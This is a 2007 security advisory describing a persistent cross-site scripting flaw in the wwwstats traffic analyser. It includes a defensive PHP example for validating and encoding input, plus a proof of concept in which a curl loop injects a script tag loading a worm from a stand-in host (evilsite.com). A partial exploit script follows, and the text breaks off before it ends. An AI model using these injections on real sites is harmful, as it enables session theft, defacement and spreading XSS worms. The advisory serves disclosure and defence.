============================================
INTERNET SECURITY AUDITORS ALERT 2007-004
- Original release date: November 7th, 2007
- Last revised: December 7th, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 4/5
============================================
I. VULNERABILITY
-------------------------
wwwstats is vulnerable to persistent XSS.
II. BACKGROUND
-------------------------
wwwstats is a very widely used Web traffic analyser that records user
agents, referers, downloads, etc. in a database.
III. DESCRIPTION
-------------------------
It is possible to inject HTML and JavaScript into the database by
calling the clickstats.php code directly. This allows web defacement,
theft of admin sessions, web redirection and XSS worms.
To bypass the first 'if', the HTTP Referer field must be filled with
something; the link is then injected into the database through the
link GET parameter.
An attacker can use the link parameter or the useragent field to
inject a script that steals the admin's cookies, defaces the site, or
does anything else...
Magic quotes configured in php.ini are no obstacle to the injection:
in JavaScript, \'test\' is interpreted as 'test'.
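The handling that closes this hole, as an added example (not wwwstats
code and not part of the original advisory): validate the link before
it is stored and HTML-encode stored values when the statistics page
renders them. It also shows why magic-quotes escaping leaves the markup
intact. The helper names is_storable_link and html_out and the sample
values are assumptions constructed for illustration.

```php
<?php
// Added example: hypothetical helpers, not taken from wwwstats.

// Accept only absolute http(s) URLs that carry no markup or control characters.
function is_storable_link(string $link): bool
{
    if (preg_match('/[<>"\'\x00-\x1f]/', $link)) {
        return false;
    }
    $scheme = parse_url($link, PHP_URL_SCHEME);
    return filter_var($link, FILTER_VALIDATE_URL) !== false
        && in_array(strtolower((string) $scheme), ['http', 'https'], true);
}

// Encode a stored value for an HTML text or quoted-attribute context at display time.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample values in the shape the advisory describes.
$samples = [
    'link'      => "<script src='http://attacker.example/x.js'></script>",
    'useragent' => "Mozilla/5.0 <script>alert('test')</script>",
    'benign'    => 'http://www.example.org/download/file.zip',
];

foreach ($samples as $field => $value) {
    // addslashes() mirrors what magic_quotes_gpc did: quotes gain a
    // backslash, but the tags survive and the browser still parses them.
    $magic = addslashes($value);
    printf(
        "%s\n  storable as link : %s\n  magic quotes     : %s\n  encoded on output: %s\n",
        $field,
        is_storable_link($value) ? 'yes' : 'no',
        $magic,
        html_out($value)
    );
}
```

The User-Agent is free text and cannot be validated as a URL, so for
that field the output encoding in html_out is the control that matters.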
IV. PROOF OF CONCEPT
-------------------------
By controlling the number of iterations, it is possible to place the
injection at the ranking position you want:
while [ 1 ]; do
curl
'http://web.com/wwwstats/clickstats.php?link=scr='http://evilsite.com/XSSWorm.js'>
------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com
if [ $# -ne 4 ]
then
echo "Usage: $0